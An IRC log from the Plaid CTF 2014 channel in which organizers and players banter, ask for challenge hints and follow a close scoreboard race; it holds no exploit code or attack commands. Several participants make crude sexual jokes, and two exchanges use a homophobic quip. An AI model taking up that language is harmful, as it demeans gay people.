(13:12:02) (_joeje_) roll 6 -> 3
(13:12:15) (chrissing) i hope its web100
(13:12:33) (+cai_) you need to roll 1 to open web100 :)
(13:12:33) (geobot) web100 either
(13:12:46) (+cai_) reversing 250 is opened
(13:12:47) (geobot) opened up some from the comp that showed the correct order, so it back
(13:12:47) (+ricky) We're going to open web100 as well
(13:12:55) (_blasty_) DO NOT LAND ON CHANCE
(13:12:59) (tokki) CHANCE
(13:13:01) (_blasty_) DO NOT WORSHIP FALSE IDOLS
(13:13:02) (tokki) YES CHANCE
(13:13:03) (+cai_) lol
(13:13:12) (chrissing) OK YAY
(13:13:13) (tokki) <3
(13:13:16) (+cai_) web100 is opened as well
(13:13:17) (geobot) reversing 250 is opened it was at defcon?
(13:13:53) (+ricky) If it ends up coming down to one or two points for the top two teams
(13:13:59) (+ricky) Then solving this stuff quick is imperative :-P
(13:14:04) (+ricky) </metagame>
(13:14:28) (robbje) cool, web.
(13:14:28) (geobot) cool, was just segfaulting/one of them had it backwards
(13:14:31) robbje fires up dirbuster
(13:14:36) (+tylerni7) robbje: >:|
(13:14:40) (+ricky) Heheh
(13:14:54) (+frozencemetery) we need a picture of ricky holding a giant hammer
(13:15:05) (+tylerni7) new ctf rules: 1) don't be a dick, 2) THAT MEANS NO FUCKING DIRBUSTER
(13:15:50) (tokki) DICKS ARE AWESOME
(13:15:55) (tokki) (?)
(13:15:56) (+frozencemetery) there are 404 users in this channel that is all
(13:16:15) qUit: (noregret) (~regret@unaffiliated/noregret) Ping timeout: 245 seconds
(13:16:24) (+frozencemetery) https://24.media.tumblr.com/tumblr_m0u527UeaF1roejvzo1_250.gif ^ relevant
(13:16:43) (+mserrano) DO YOU WANT AN HTML 5 THAT DOESN'T TAKE ADVANTAGE OF JUMP LISTS
(13:16:53) (tokki) lol
(13:17:09) (+mserrano) ON WINDOWS. ONLY WINDOWS. THE OTHER PLATFORMS ARE NOT NATIVE
(13:17:47) jOin: (bwn3r) (~n00b13@unaffiliated/nitsua)
(13:18:49) (tokki) MACCC
(13:18:51) (tokki) MACCCCCC
(13:20:58) (Hertz) what's the point of this web 100
(13:21:33) (+frozencemetery) Hertz: man, way to go all existential on us
(13:21:34) (+frozencemetery) gosh
(13:22:01) (+ricky) Hertz: http://www.shapesecurity.com/
(13:22:33) (+tylerni7) ricky: any resemblance to that is purely coincedential, I'm sure
(13:23:36) (_blasty_) can I message someone about web100 ?
(13:23:48) (+ricky) _blasty_: Feel free to message me
(13:23:49) (_blasty_) hmm well lets try a bit harder first
(13:23:53) (+ricky) OK
(13:23:58) (+ricky) Though cai_ wrote this
(13:24:30) qUit: (ronbarrey) (
[email protected]) Remote host closed the connection
(13:24:42) (+mserrano) AWWWWWW SHEEEEEITTTTTTTTt
(13:24:46) (+mserrano) 1pt difference
(13:25:10) (+ricky) Way to keep things exciting, Dragon Sector!
(13:25:18) (+ricky) 1 point difference, go go go breakthrough!
(13:25:44) (robbje) oh, wow
(13:25:53) (sven) :D
(13:25:55) (sven) not good.
(13:26:00) sven needs to stop failing
(13:26:23) (halfvollemelk) you want it DIRTY NATIVE
(13:26:27) (tokki) OOOOH SHETTTT
(13:26:33) (tokki) They only need poop!
(13:27:04) (_blasty_) FUCK FUCK FUCK
(13:27:06) qUit: (Beched) (6dbc7f17@gateway/web/freenode/ip.109.188.127.23) Ping timeout: 240 seconds
(13:27:39) (trelgak) Can anyone help me with Reversing 200?
(13:27:39) (geobot) you manage to change any libc for crypto 200?
(13:28:12) (+mserrano) _blasty_: solve problem gogogogo
(13:28:16) (tomcr00se) what user do we want to be on web100?
(13:28:18) (+ricky) 0xffa has a big head start on bronies 2 thouh - would be awesome if that were the distinguisher :-)
(13:28:27) (+tylerni7) lol
(13:28:47) (iago-x86) Hmm, my whatscat test payload worked once, but isn't working a second time, even with a new account.. is there caching going on that I have to watch out for?
(13:29:00) (+tylerni7) iago-x86: we have done nothing special
(13:29:03) (Im11Plus1) Questions on freya....who can help?
(13:29:08) (iago-x86) Hmm, weird, I can do it over and over on my own box
(13:29:09) (+ricky) Nice 0xffa!
(13:29:15) (+tylerni7) ...and 0xffa back on top :O
(13:29:17) (+tylerni7) this is so exciting
(13:29:18) (sven) \o/
(13:29:21) (+ricky) Now leading by 256
(13:29:24) (+tylerni7) iago-x86: feel free to pm
(13:29:26) (+frozencemetery) Im11Plus1: hit me
(13:29:33) +tylerni7 slaps frozencemetery
(13:29:35) +ricky slaps frozencemetery
(13:29:45) (dwn) hey who can I PM for something on whatscat
(13:29:47) (+frozencemetery) D:
(13:29:49) (+tylerni7) dwn: me
(13:30:02) jOin: (Lel) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
(13:30:24) jOin: (Reset__) (79b22486@gateway/web/freenode/ip.121.178.36.134)
(13:30:26) nIck: (Lel) is now known as (Guest74316)
(13:30:42) nIck: (Guest74316) is now known as (Hero2Day)
(13:34:36) (+gbarboza) robbje: did you still have a tenement question?
(13:35:37) mOde: (ChanServ) sets (+o mserrano)
(13:35:42) tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 2.5 Hours left | $30 added to each cash prizes so far (from CHANCE card))
(13:38:27) qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Quit: Page closed
(13:39:33) nIck: ([pwn]TM) is now known as (Thordenm)
(13:39:34) (+tylerni7) robot mafia
(13:39:36) (+tylerni7) what are you doing
(13:39:40) (+tylerni7) stahp
(13:39:48) (Thordenm) we are robot talking over!
(13:40:24) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(13:40:33) (@mserrano) robot mafia seriously what
(13:40:49) (_blasty_) ?
(13:41:04) (@mserrano) they are submitting a ton of huge random numbers as flags
(13:41:06) mOde: (mserrano) sets (-o mserrano)
(13:41:08) (+ricky) (Spamming random key submissoins)
(13:41:11) (+tylerni7) _blasty_: they are submitting like.. 30 digit numbers to us
(13:41:31) (_blasty_) lol
(13:41:38) (+tylerni7) we don't know why
(13:42:16) (deject3d) does ponyboy2004 check his pm's instantly
(13:42:46) (criple_ripper) how much time left?
(13:42:53) (+tylerni7) 2 hours 17 minutes
(13:44:07) (+ricky) deject3d: looking now , look slike there was an issue
(13:44:33) (deject3d) i verified he checked a pm like 40 mins ago but now my attack doesn't seem to be doing anything
(13:44:42) (deject3d) ty for checking
(13:45:08) (|x_x|) Submitting 30 digit number strings as keys works? I need to get in on that.
(13:45:16) (+tylerni7) :|
(13:45:19) (|x_x|) :3
(13:45:21) (Pitr_) thanks for the hint. Back to WWW::Mechanize!
(13:45:35) (+frozencemetery) D:
(13:46:54) (+ricky) deject3d: Sorry, fixed now
(13:47:07) (deject3d) works, ty
(13:48:47) (+ricky) ponyboy2004 got banned for dirbustering
(13:48:49) (+ricky) That's why it was broken
(13:48:50) (+mserrano) lol
(13:48:51) (+tylerni7) lol
(13:48:52) (Guest68736) halp2js ..... the guy who wrote the javacode should get an oscar ...
(13:48:57) (+mserrano) Guest68736: thank clockish
(13:49:08) (+tylerni7) spam and hex
(13:49:08) (plaintext) fuck yeah
(13:49:09) (+tylerni7) nice :D
(13:49:12) (plaintext) ty :D
(13:49:34) (deject3d) omg ponyboy navigates away from his pms so fast
(13:49:43) (+ricky) It's not *that* fast
(13:49:55) (+ricky) Oh if you're using something interactive then it's fast
(13:50:02) (+ricky) Nice, 0xffa cements their lead some more
(13:50:10) (_blasty_) DO NOT
(13:50:12) (_blasty_) WORSHIP
(13:50:13) (_blasty_) FALSE IDOLS
(13:50:18) (+tylerni7) wut
(13:51:06) qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
(13:51:11) (+awesie) w/ion 7
(13:51:13) (+awesie) ugh
(13:51:27) (robbje) gbarboza: no
(13:51:45) (robbje) gbarboza: it dropped the flag literally a minute later ;)
(13:51:58) (+ricky) :-)
(13:52:04) qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Quit: Page closed
(13:52:16) (+ricky) Somebody hack the Bigson!
(13:52:24) (tomcr00se) Bigson!!!
(13:52:32) (+ricky) tomcr00se: Are you hacking the Bigson?
(13:52:42) (tomcr00se) lol nope too big son
(13:52:48) (tomcr00se) i'm solving web100
(13:52:52) (+ricky) Aw
(13:52:53) jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
(13:53:05) (tomcr00se) brute forcing the whole oxford english dictionary now
(13:53:28) (+ricky) Wow, 0xffa just widening the gap
(13:53:32) (|x_x|) There's a web100?!
(13:53:35) (|x_x|) There's a web100!
(13:53:35) (geobot) if there's a difference between us or could be doing it wrong
(13:53:36) qUit: (someone__) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34) Ping timeout: 240 seconds
(13:53:38) |x_x| is still in the game.
(13:53:41) (+tylerni7) dragon sector, you better catch up :O
(13:53:41) (Tapyroe__) Arghh, mt. pox has been thwarting me since the start! I'd love to finish it before this ends.. Anyone I can pm about it?
(13:53:41) (_blasty_) :-]
(13:53:57) +ricky is curious as to how big 0xffa is
(13:53:59) (+tylerni7) Tapyroe__: you can pm.. not sure how much I'll help though :)
(13:54:00) (+ricky) This stream of solves is impressive
(13:54:18) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(13:54:18) (Guest68736) anyone have an idea how to solve this java script code and have a hint :X
(13:54:18) (geobot) better than a java prng thing and you have to me
(13:54:30) (KT) is parlor solvable now?
(13:54:48) (+tylerni7) KT: ?
(13:56:18) qUit: (chrissing) (
[email protected]) Remote host closed the connection
(13:58:33) (lkwpeter) should we really try manual bruteforcing for web 100 ?!
(13:58:34) (geobot) but not the hash in the manual matches what the world
(13:58:43) (sven) [20:54:39] ricky is curious as to how big 0xffa is
(13:58:45) (sven) we're just awesome!
(13:58:52) (+ricky) :-)
(13:59:00) (+tylerni7) well we can see how awesome you are :)
(13:59:05) (robbje) and how many is awesome? :>
(13:59:05) (+tylerni7) but how big are you :P
(13:59:07) (clockish) geobot: chicken chicken chicken chicken chicken
(13:59:20) (clockish) geobot: chicken chicken chicken chicken chicken chicken
(13:59:23) (clockish) awww
(13:59:30) (Guest68736) tomcr00se: oxford dict. works ? :D
(13:59:32) (+ricky) geobot: banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana
(13:59:33) (Guest68736) on web100
(13:59:33) (geobot) web100
(13:59:46) (Adran) on w
(13:59:46) (Hertz) yea works
(13:59:47) (Hertz) :D
(13:59:52) (sven) i'm about 5' 11"
(13:59:59) (+tylerni7) sven: ah okay, thanks
(14:00:05) (+dickoff) world's largest ctf player
(14:00:08) (sven) always glad to help!
(14:00:09) (geobot) (i'm glad to a team that means like pwn2own/pwnium 0days :p
(14:00:52) (+ricky) Only 2 more hours!
(14:00:57) (+tylerni7) D:
(14:01:05) (+tylerni7) and the top 3 are still in contention!
(14:01:22) (Hertz) give me some flags, to have top 4 in contention
(14:01:22) (AnthraX101) And the last file just opened. Lucky, that :P
(14:01:29) (nopple) geobot: ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese
(14:01:33) (+ricky) Hahh
(14:01:35) (+ricky) Oh wow
(14:01:38) (+ricky) Jackshit is out
(14:01:42) (+ricky) Go go go
(14:01:48) (+ricky) (As if we didn't already have enough challenges0
(14:01:52) (+ricky) This will be the last one I believe
(14:01:54) (+ricky) Have fnu
(14:02:32) jOin: (amar) (80edcf34@gateway/web/freenode/ip.128.237.207.52)
(14:02:56) nIck: (amar) is now known as (Guest75992)
(14:07:01) (mrsmith67) for web100 does bruting with oed really work?
(14:07:33) (lkwpeter) good question
(14:07:40) (lkwpeter) forbidden or allowed ?!
(14:08:18) (+tylerni7) it won't work...
(14:08:21) (+tylerni7) well
(14:08:24) (+tylerni7) you can try
(14:09:50) jOin: (someone_) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34)
(14:09:50) (almac) who can I PM to get a little guidance for kpop?
(14:09:54) nIck: (lmoro) is now known as (johnCool)
(14:10:04) (+ricky) Aaaany more bronies questions? Someone's got to take the 500 points :-)
(14:10:20) (Adran) ricky: what is the answer? =D
(14:10:23) (+tylerni7) poop
(14:10:24) (Adran) (joking)
(14:10:28) (+ricky) The answer is the contents of the key file
(14:10:29) (geobot) or the contents of jerkcity
(14:10:38) (+tylerni7) geobot: you are the best
(14:10:38) jOin: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248)
(14:13:12) (wtbw) how long left?
(14:13:26) (+cai_) little less than 2 hours
(14:14:16) (+ricky) Enough time to hack the Bigson!
(14:14:20) (+tylerni7) :P
(14:14:40) (johnCool) Well, I've got enough of this :) Thanks you guys it was a great ctf.
(14:14:48) (+ricky) Thanks for playing!
(14:14:52) (wtbw) ty
(14:15:53) (NK_) just to be sure
(14:15:57) (halfvollemelk) web100.. i'm logged in as admin, but no admin interface?
(14:15:57) (geobot) i am going for bronies 2 logged in physical sports?
(14:15:59) (NK_) is the tor service still up ?
(14:16:04) (+tylerni7) NK_: :|
(14:16:07) (+tylerni7) I will check
(14:16:08) (+tylerni7) but...
(14:16:12) (+tylerni7) it has been up the entire game
(14:16:13) (+houqp_) ninjafish: yes
(14:16:15) (NK_) okay :)
(14:16:15) (+tylerni7) and like 100 people have asked
(14:16:18) (+houqp_) NK_: yes
(14:16:21) (NK_) oh
(14:16:28) (NK_) sorry then :)
(14:16:32) (+ricky) halfvollemelk: There should be a message that tells you what to do next when you login as admin
(14:17:23) (NK_) tor is too damn slow
(14:17:40) (Zoro) molasses
(14:17:46) (+houqp_) NK_: yeah, you need to do somethign about it
(14:18:11) (NK_) okay
(14:18:41) (foundation) i have a new feature request for radare2
(14:18:47) (NK_) i see
(14:18:57) (foundation) fing C++ template debugging support!!!
(14:19:13) (Guest68736) hahahaha the video on web100
(14:19:15) (Guest68736) xD
(14:19:49) (ciliated) any hints on kpop?
(14:19:49) (geobot) darn, we should use pm for kpop?
(14:21:51) (Zoro) What are the CHANCE tiles for?
(14:22:04) (+tylerni7) Zoro: read the rules
(14:22:06) qUit: (himanshu_) (1b22f3ba@gateway/web/freenode/ip.27.34.243.186) Ping timeout: 240 seconds
(14:22:09) mOde: (ChanServ) sets (+o cai_)
(14:22:23) tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 2.5 Hours left | $40 added to each cash prizes so far (from CHANCE card))
(14:22:28) (@cai_) apparently i missed one :p
(14:22:31) (+tylerni7) :O
(14:22:42) mOde: (ChanServ) sets (-o cai_)
(14:22:52) (jagger_) 2.5h? and not 1.5?
(14:22:57) (+cai_) 1.5
(14:23:13) (+cai_) i only updated the cash bonus. i'll update topic again
(14:23:18) mOde: (ChanServ) sets (+o cai_)
(14:23:31) tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 1.5 Hours left | $40 added to each cash prizes so far (from CHANCE card))
(14:23:38) mOde: (ChanServ) sets (-o cai_)
(14:27:34) (+mserrano) Hi Brooklynt Overflow
(14:27:39) (+mserrano) We are glad you had a burger for lunch and it was good
(14:27:40) (+dickoff) Brooklynt_Overfl: Where'd you get your burger
(14:27:46) (+ricky) We had Indian food for lunch
(14:27:54) (+ricky) It was better than your burger
(14:28:01) (+tylerni7) ricky: did you get it from the place on craig?
(14:28:04) (+ricky) Yup
(14:28:07) (+tylerni7) how was it?
(14:28:08) (+ricky) Big fan of that place
(14:28:10) (+tylerni7) I've never been there
(14:28:14) (+tylerni7) not tamarind, righ?
(14:28:14) (+ricky) Oh you've got to try it
(14:28:17) (+tylerni7) right*
(14:28:18) (+ricky) No, Kohli's
(14:28:21) (+tylerni7) huh
(14:28:23) (zoku) I have ezhp working locally, but not on your server?
(14:28:24) (+mserrano) tylerni7: tamarind is super good but way more expensive
(14:28:29) nIck: (bool1011) is now known as (bool101)
(14:28:29) (+mserrano) zoku: are you assuming aslr is off
(14:28:32) (zoku) yes
(14:28:32) (+tylerni7) I went to the old one before they shut down, and it was /ok/
(14:28:32) (+mserrano) because that assumption is wrong
(14:28:36) jOin: (bool101) (~bool@unaffiliated/bool101)
(14:28:36) (zoku) er, sorry mserrano, no
(14:28:37) (+tylerni7) hadn't been to the new one
(14:28:42) (zoku) mserrano: it runs on my server with aslr on
(14:28:49) (zoku) $ cat /proc/sys/kernel/randomize_va_space
(14:28:53) (zoku) 2
(14:28:59) (+mserrano) zoku: on some systems aslr does not randomize the relevant thing
(14:29:04) (+mserrano) on our system it does
(14:29:09) (+mserrano) v0v
(14:29:12) (zoku) god damnit
(14:29:17) (+tylerni7) oh boy, dragon sector got zfs
(14:29:21) (+tylerni7) :O
(14:29:22) (+ricky) Uh oh
(14:29:22) (+mserrano) The binary running on the server is the same as the one we gave you
(14:29:24) (+tylerni7) WHO WILL WIN
(14:29:25) (+ricky) Getting cloes again
(14:29:27) (+tylerni7) this is so exciting
(14:29:28) (+mserrano) and it has been confirmed to work
(14:29:31) (+mserrano) MUCH EXCITE
(14:29:32) (+mserrano) SUCH WOW
(14:29:34) (+ricky) I think whoever hacks the Bigson will win
(14:29:34) (+mserrano) VERY FLAGE
(14:29:35) (geobot) teh flage is not poop
(14:29:36) (+mserrano) MANY CTF
(14:29:40) (+ricky) So you should all drop everything and go hack the Bigson
(14:29:54) (+frozencemetery) worship the old norse gods!
(14:30:00) (+tylerni7) geobot: that's not even true!
(14:30:00) (geobot) not even tried to determine who gets to you might be stuck on some inconsistencies in windows but works
(14:30:02) (+dickoff) geobot: don't leak flags in channel please
(14:30:05) (clockish) geobot: you lie!
(14:30:07) (+ricky) geobot: banana
(14:30:23) (+mserrano) geobot: banana
(14:30:29) (+houqp_) geobot: banana
(14:30:30) (clockish) geobot: banana banana banana banana banana banana
(14:30:43) (+cai_) geobot: banana
(14:30:50) (+dickoff) I like bananas
(14:30:52) (wtbw) O_o
(14:30:58) (+frozencemetery) geobot: bananananananabatman
(14:31:05) (clockish) banana banana banana banana banana banana
(14:31:09) (+houqp_) geobot: poopnana
(14:31:15) (+dickoff) he's too clever for us
(14:31:28) (KT) lol :)
(14:32:48) (+ricky) You can hack the Bigson from a mobile device - isn't web awesome?
(14:33:10) (Thordenm) ricky: but can you do it with punchcards?
(14:33:16) jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
(14:33:22) jOin: (nonconstant) (c1e17dfd@gateway/web/freenode/ip.193.225.125.253)
(14:33:26) (sweet_potatoes) any hint for web200 (javascript one) :/ ?
(14:33:31) (oceanx) banananaaaaa
(14:33:34) (sweet_potatoes) lolz
(14:33:44) (sweet_potatoes) oceanx: sexy ?
(14:33:44) (sigsegv_) any hints on stego?
(14:33:45) (geobot) i'm done according to organizers told us hints
(14:34:02) (+tylerni7) sigsegv_: the flag is INSIDE THE COMPUTER
(14:34:15) (inter) tylerni7: NO THE FLAG IS IN YOUR MIND
(14:34:22) (inter) SO YOU TELL; ME
(14:34:27) (Zerith) where do I enter a key for Misc ? :\
(14:34:27) (geobot) just enter the r_netsec folks
(14:34:30) (Zerith) oops
(14:34:35) (Zerith) ignore dat
(14:34:37) (+mserrano) Zerith: same place you enter any key
(14:34:37) (+mserrano) lol
(14:35:03) (+frozencemetery) i,i bend over and I'll show you
(14:35:06) (inter) you shouldve
(14:35:17) (inter) named the multiplication question "multiplication is gay"
(14:35:50) (+frozencemetery) yeah that's not happening inter.
(14:35:52) (_blasty_) ok
(14:36:05) (Pitr_) wrong. gay multiplication is an oxymoron amongst almost all species.
(14:36:12) (`Peluche) For chall graphs (crypto 200), when we got the message, do we have to do someting next with the message or the message is the flag ?
(14:36:20) (+mserrano) `Peluche: the message is the flag
(14:36:21) (geobot) geobot can always know who own the message someone about 5 hours
(14:36:27) (+mserrano) but you can decode the number into text
(14:38:40) (`Peluche) mserrano: ok. thanks, so I guess I don't have the good number ^^
(14:38:44) (HeartLESS_) who is not busy? Have a question about web100
(14:38:45) (geobot) re200 runned correctly but not the video on web100 please?
(14:39:35) (HeartLESS_) ricky, I`ve wrote you pm
(14:39:37) (inter) tylerni7 is watching ponies, so hes not busy HeartLESS_
(14:39:40) (HeartLESS_) written*
(14:39:51) (+cai_) HeartLESS_: you can pm me
(14:40:35) qUit: (bool101) (~bool@unaffiliated/bool101) Ping timeout: 240 seconds
(14:42:56) jOin: (Gut_) (uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw)
(14:43:29) (zoku) I've been working on ezhp all weekend and it works on all my systemmss, I just wanna scoree!
(14:43:41) jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
(14:43:53) (+ricky) zoku: So you have a shell on one of our systems right
(14:44:01) (+ricky) Via the sass problem
(14:44:05) (+ricky) See if you can make it work on our system
(14:44:22) (sven) asking for a friend: what if i root that system to grab the flag? :-P
(14:44:23) (geobot) grats stratum auhuur for the web100 flag?
(14:45:08) qUit: (gut) (
[email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
(14:45:51) (+tylerni7) sven: hmm ricky what do you think?
(14:46:02) (+tylerni7) sven: I'm not sure how much it'll help :P
(14:46:03) (geobot) it'll be done this year
(14:46:12) (_blasty_) DO WE BURN 0DAY YES NO ?
(14:46:29) (+mserrano) _blasty_: you... definitely do not have to
(14:46:33) (iago-x86) blackops: obviously
(14:46:41) (iago-x86) DOL IT
(14:46:42) (iago-x86) DO IT
(14:46:43) (+mserrano) _blasty_: you should solve bronies2 though
(14:46:44) (+mserrano) you can do it
(14:46:47) (+mserrano) I believe in you
(14:46:52) (+cai_) _blasty_: you could, and include that in your writeup
(14:46:58) (+tylerni7) xD
(14:47:01) (+mserrano) pls include full 0day in writeup
(14:47:04) (+dickoff) _blasty_: is it worth 4k? :)
(14:47:08) (+mserrano) 8k*
(14:47:12) (clockish) _blasty_: will trade 0-days 4 flags
(14:47:13) (+mserrano) or I guess 4k, yeah
(14:47:14) (+tylerni7) mserrano: well 1st vs 2nd
(14:48:29) (+cai_) man, it's gonna be a huge pain to do a write-up for the ctf.. lol 30 something problems
(14:48:35) (+cai_) good luck..
(14:48:48) (+ricky) Hehe
(14:48:52) (+ricky) Didn't think of that :-)
(14:49:00) (+ricky) I see that the bigson is crashing
(14:49:11) (+ricky) This is a great sign :-)
(14:49:29) (sven) who would make that poor thing crash? :-(
(14:49:43) (spq) ricky: can we ask something about web800?
(14:49:58) (+ricky) spq: Sure thing
(14:49:58) (+mserrano) spq: ask away, you may not get a good answer :P
(14:50:38) (iago-x86) Luckily, I only solved a few. Easy to make writeup! :)
(14:51:01) (+tylerni7) iago-x86: writeup is just for cash prizes :)
(14:51:10) (+ricky) Shhh don't tell him that!
(14:51:11) (marcoscars02) xD
(14:51:13) (+mserrano) although we would be happy if you wrote writeups anyway :P
(14:51:24) (+tylerni7) EVERYONE WHO REGISTED IS REQUIRED TO MAKE WRITEUPS
(14:51:25) (marcoscars02) tylerni7, or to fill a blog
(14:51:26) (marcoscars02) XD
(14:51:29) (+tylerni7) otherwise we'll kill you
(14:51:31) (clockish) yeah, everyone should do writeups!
(14:51:35) (clockish) democratize hacking!
(14:51:42) (+tylerni7) clockish: keep hacking elite!
(14:51:46) (+mserrano) unless you're tomcr00se in which case no writeups
(14:51:50) (+mserrano) in order to keep hacking elite
(14:51:50) (+frozencemetery) s/democratize/demoralize/ <-- for the way I read it first
(14:51:55) (clockish) tylerni7: up with the proletariat
(14:52:02) (poppopret) why does tomcr00se not write writeups?
(14:52:08) (inter) cuz he has swag
(14:52:10) (+tylerni7) poppopret: he wants to keep hacking elite
(14:52:14) (+mserrano) efn
(14:52:15) (+tylerni7) poppopret: also he's kind of a dick
(14:52:16) (+mserrano) efb*
(14:52:21) (+tylerni7) tomcr00se: <3
(14:52:29) mOde: (ChanServ) sets (+o cai_)
(14:52:39) (+mserrano) 70min to go
(14:52:46) tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 1 Hour left | $40 added to each cash prizes so far (from CHANCE card))
(14:52:51) (+mserrano) 67*
(14:52:55) mOde: (ChanServ) sets (-o cai_)
(14:53:00) (+mserrano) go go go 0xffa/ds/mslc/etc
(14:53:09) (+mserrano) WHO WILL WIN THE ULTIMATE SHOWDOWN OF ULTIMATE HACKERY
(14:53:18) (clockish) tylerni7: note that we're not exactly great about writeups, either...
(14:53:29) (+ricky) Hey when we're required to, we write them
(14:53:52) (+cai_) we will turn off the scoreboard for the last hour
(14:54:09) (+cai_) j/k
(14:54:38) (+ricky) Half the room was about to turn around and yell at cai_
(14:54:42) (tokki) lol
(14:54:52) (+ricky) (The room we're sitting in)
(14:54:58) (+mserrano) naw we shoulda turned it off like 8 hours before the end
(14:55:01) (tokki) lool
(14:55:02) (+mserrano) codegate style
(14:55:21) ([CISSP]HoLyVieR) for the polygon challenge, was there anything posted about the dictionnary we have to brute-force with ? Or just any dictionnary should do ?
(14:55:21) (sven) pf, it's way more exciting this way :)
(14:55:30) (+mserrano) [CISSP]HoLyVieR: wat
(14:55:54) (+ricky) So PPP doesn't do stupid password brute forcing challenges
(14:56:04) (+ricky) Unless it's a crypto thing where the brute force is reasonable
(14:56:12) (clockish) and local
(14:56:13) (+ricky) Please note this for the future :-)
(14:56:15) (tokki) lol
(14:56:19) ([CISSP]HoLyVieR) "They claim bots can no longer attack the website protected by the Polygon Shifter. Do we need to manually bruteforce the credentials?"
(14:56:23) ([CISSP]HoLyVieR) that's in the description
(14:56:36) (+mserrano) [CISSP]HoLyVieR: if the question ever mentions manual bruteforcng
(14:56:42) (+ricky) OK, that's kind of just part of the whole making fun of shapesecurity
(14:56:42) (+mserrano) the answer is not manual bruteforcing
(14:56:48) (+mserrano) when's the last time you manually bruteforced something
(14:56:52) (+mserrano) and enjoyed it
(14:56:54) (+ricky) Like it's supposed to be sarcastic
(14:56:58) ([CISSP]HoLyVieR) I'm not manually brute-forcing it
(14:57:00) (oceanx) lol
(14:57:16) (+mserrano) bruteforce is not the answer
(14:57:26) (sven) it's a start, though
(14:57:31) (+mserrano) not a good one
(14:57:34) qUit: (HeartLESS_) (2e000ac9@gateway/web/freenode/ip.46.0.10.201) Quit: Page closed
(14:57:39) (sven) never claimed that :)
(14:57:52) (foundation) say no to manual bruteforcee!
(14:57:53) (tokki) i just had 30mins of manual bruteforcing lol
(14:58:06) (Adran) tokki: did that work?
(14:58:10) (sven) use automated bruteforce instead. more fun for everyone!
(14:58:15) (positron_) how to solve kpop without file write
(14:58:17) (tokki) :D YES
(14:58:32) (Adran) tokki: *.*
(14:58:33) (tokki) positron_: listen to kpops..?
(14:58:34) (Adran) ugh
(14:58:38) (tokki) *.*
(14:58:41) qUit: (LouTerrailloune) (
[email protected]) Quit: Nettalk6 - www.ntalk.de
(14:58:49) jOin: (opxx) (5b79cbc3@gateway/web/freenode/ip.91.121.203.195)
(14:59:02) (opxx) how much time left?
(14:59:05) (tokki) 1HR
(14:59:08) (tokki) 111111
(14:59:12) (opxx) damn
(14:59:25) (tokki) ikr
(14:59:32) qUit: (Hero2Day) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Excess Flood
(14:59:36) (opxx) stil no idwa about that js-web... this one + web800 are the hardest one
(14:59:47) jOin: (nope_) (81f49032@gateway/web/freenode/ip.129.244.144.50)
(14:59:54) (opxx) *idea
(14:59:57) (tokki) GOOD LUCK GUYS FOR THE LAST HOUR
(15:00:05) (+ricky) web800 is quality enterprise web
(15:00:14) (sven) for some value of quality
(15:00:21) jOin: (Hero2Morow) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
(15:00:27) (opxx) what do u mean by that?
(15:00:34) (sven) nothing.
(15:01:06) (+ricky) I think 0xffa is about to solve part
(15:01:07) (+ricky) 2
(15:01:07) (ius) ricky: its not written in java is it
(15:01:10) qUit: (Reset__) (79b22486@gateway/web/freenode/ip.121.178.36.134) Quit: Page closed
(15:01:13) (+ricky) Super super close :-)
(15:01:14) qUit: (nope_) (81f49032@gateway/web/freenode/ip.129.244.144.50) Client Quit
(15:01:29) (Adran) ricky: i'm presuming you're monitoring the stuff? :P
(15:01:36) (+ricky) :-)
(15:01:36) (+cai_) Adran: he is :)
(15:01:54) (Adran) fun
(15:02:15) (+ricky) Anyway, I suspect it's gg after you get that
(15:02:16) (tokki) ftw!
(15:02:19) (+ricky) Nicely done
(15:02:34) (+tylerni7) nicely *almost* done
(15:02:35) (+tylerni7) :P
(15:02:41) (+ricky) I'm sure it's coming any second now
(15:02:46) (+tylerni7) that's what she said
(15:02:53) (mathiasbynens) :D
(15:02:53) (+mserrano) :D
(15:02:54) (+ricky) :-(
(15:03:20) (tokki) :D lol
(15:05:26) (inter) dude
(15:05:29) (inter) i
(15:05:36) (inter) i cant
(15:05:42) (inter) handle the ponies anymore
(15:06:03) (qll) xD
(15:06:15) (+ricky) Heheh
(15:08:31) (batzig_) for crypto 200 (graphs) does the decrypted number need to be converted to a string to be submitted?
(15:08:31) (tokki) my friend's saying he is getting high on ponies
(15:08:36) (+tylerni7) batzig_: yes
(15:09:08) (WuZ) I have a question for "rendez-vous", which admin can I pm?
(15:09:11) (opxx) any hint for halphow2js will be released?
(15:09:19) (+mserrano) 50min
(15:09:30) (iZsh) i'm about to have a heartattack
(15:09:34) (tokki) they're gonna release hints like
(15:09:34) sven too
(15:09:41) (tokki) in the last 30 seconds
(15:09:50) (opxx) ^^
(15:09:53) (+mserrano) lol
(15:10:01) sven can't take the suspense anymore :<
(15:10:03) (+mserrano) iZsh / sven: don't die
(15:10:16) (+tylerni7) at least not until you solve bronies
(15:10:26) (tokki) brownies!
(15:11:15) jOin: (hammerpig) (~user@gateway/tor-sasl/hammerpig)
